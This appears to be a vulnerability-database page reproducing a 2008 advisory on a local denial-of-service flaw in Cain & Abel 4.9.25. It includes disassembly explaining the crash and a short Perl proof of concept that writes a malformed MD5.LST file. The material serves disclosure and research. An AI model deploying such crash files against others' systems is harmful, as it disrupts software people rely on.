Lucene search
K

Cain And Abel 4.9.25 Denial Of Service

🗓️ 30 Dec 2008 00:00:00Reported by Glafkos CharalambousType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Cain & Abel 4.9.25 Denial Of Service vulnerabilit

Code
`Title: Cain & Abel <= 4.9.25 Local Denial Of Service  
Site: http://www.oxid.it/cain.html  
Date: 15.12.2008  
Author(s): Glafkos Charalambous  
glafkos[at]astalavista[dot]com  
George Nicolaou  
ishtus[at]astalavista[dot]com  
  
Technical Description:  
  
0042DAD1 56 PUSH ESI ; length  
0042DAD2 57 PUSH EDI ; hash  
0042DAD3 E8 686A1000 CALL dmp_.00534540 ; check_validity(char *hash,int length) return allocated space offset  
0042DAD8 68 C8010000 PUSH 1C8  
0042DADD 8BE8 MOV EBP,EAX ; Take the return offset from check_validity() and store in EBP  
  
Function at 0x534540 returns EAX = 00000000 if length >= 1 and any of the characters in a hash are not hexadecimal OR it  
returns a memory pointer  
  
0042DB19 8BF5 MOV ESI,EBP ; ESI = EBP  
0042DB1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; Crash if ECX != 00  
0042DB1D 8BC8 MOV ECX,EAX  
0042DB1F 83E1 03 AND ECX,3  
0042DB22 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; Crash  
  
AT 0042DB1B  
ECX=00000004 (decimal 4.) (REP counter)  
DS:[ESI]=[00000000]=???  
ES:[EDI]=[01500B48]=00000000  
(note that if ECX = 00000000 (counter), then the crash occurs at 0042DB22)  
  
Therefore as long as the hash contains one non-hexadecimal character and its length is greater than 2, cain crashes.  
  
Similar issues exist in other LST files  
  
POC Code:  
  
#!/usr/bin/perl  
#  
# Author(s)  
# Glafkos Charalambous [glafkos at astalavista dot com]  
# George Nicolaou [ishtus at astalavista dot com]  
#  
# Title Cain & Abel <= 4.9.25 Local Denial Of Service  
# Get your copy: http://www.oxid.it/cain.html  
# Date 15.12.2008  
  
use strict; use warnings;  
my $evil = "amVsZW5hdnVrb3ZpYzIwMDBAeWFob28u";  
my $n = "\x09" x 2;  
# You can also try MD2/MD4 LST  
open(my $LST, "> MD5.LST");  
print $LST $evil.$n;  
close($LST);  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation